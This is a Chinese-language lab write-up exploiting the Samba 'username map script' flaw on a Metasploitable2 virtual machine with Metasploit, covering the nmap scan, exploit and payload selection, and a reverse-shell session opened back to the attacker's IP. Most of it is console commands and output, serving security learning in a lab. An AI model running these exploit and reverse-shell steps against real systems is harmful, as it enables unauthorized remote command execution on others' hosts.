传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行
这里使用的目标机是metasploitable2
linux攻击机:192.168.43.113 linux目标机:192.168.43.23首先对目标机进行扫描,收集可用的服务信息,使用nmap扫描查看系统开放端口和相关的应用程序
msf5 > nmap -sV 192.168.43.23 [*] exec: nmap -sV 192.168.43.23 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST Nmap scan report for 192.168.43.23 Host is up (0.0012s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec? 513/tcp open login? 514/tcp open shell? 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open bindshell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13? 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL SF:,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\SF:n"); MAC Address: 00:0C:29:FA:DD:2A (VMware) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect resultsat https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds可以看到目标机开着Samba 3.x服务,通过search samba 3.x来找到利用模块
msf5 > search samba 3.x Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 auxiliary/admin/http/intersil_pass_reset 2007-09-10 normal Yes Intersil (Boa) HTTPd Basic Authentication Password Reset 2 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal 3 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow 4 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow 5 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow 6 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules 7 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State 8 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner 9 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 10 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection 11 exploit/linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection 12 exploit/linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution 13 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) 14 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load 15 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow 16 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow 17 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 18 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution 19 exploit/multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution 20 exploit/multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution 21 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution 22 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution 23 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution 24 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow 25 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution 26 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 27 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 28 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 29 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) 30 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection 31 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution 32 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution 33 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution 34 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution 35 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability 36 exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection 37 exploit/windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow 38 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution 39 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow 40 exploit/windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow 41 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow 42 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow 43 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource 44 post/linux/gather/enum_configs normal No Linux Gather Configurations使用该漏洞利用模块,然后查看该漏洞利用模块下可供选择的攻击载荷模块
msf5 > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK) 2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd) 3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd) 4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua) 5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat) 6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e) 7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6 8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl) 9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6 10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R) 11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby) 12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6 13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat) 14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh) 15 cmd/unix/generic normal No Unix Command, Generic Command Execution 16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet) 17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK) 18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet) 19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh) 20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua) 21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat) 22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat) 23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e) 24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl) 25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl) 26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl) 27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php) 28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python) 29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python) 30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R) 31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby) 32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby) 33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat) 34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet) 35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)设置cmd/unix/reverse反向攻击载荷模块 设置目标机IP地址 设置漏洞利用的端口号 设置发动攻击主机IP地址
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23 RHOSTS => 192.168.43.23 msf5 exploit(multi/samba/usermap_script) > set RPORT 445 RPORT => 445 msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113 LHOST => 192.168.43.113 msf5 exploit(multi/samba/usermap_script) > options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.43.23 yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.113 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic设置完成我们exploit或者run一下
msf5 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP double handler on 192.168.43.113:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo oQwX81x659bJ0os8; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "oQwX81x659bJ0os8\r\n" [*] Matching... [*] A is input... [*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800msf攻击成功后会获取目标主机的shell,为了验证该shell是目标机的,可以查询主机名、用户名和IP
ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a inet addr:192.168.43.23 Bcast:192.168.43.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2410 errors:0 dropped:0 overruns:0 frame:0 TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:190106 (185.6 KB) TX bytes:138231 (134.9 KB) Interrupt:17 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:278 errors:0 dropped:0 overruns:0 frame:0 TX packets:278 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:110249 (107.6 KB) TX bytes:110249 (107.6 KB)可以看到命令已经执行了。
总结:攻击五分钟,搭建两小时。又是朴实而又充实的一天啊!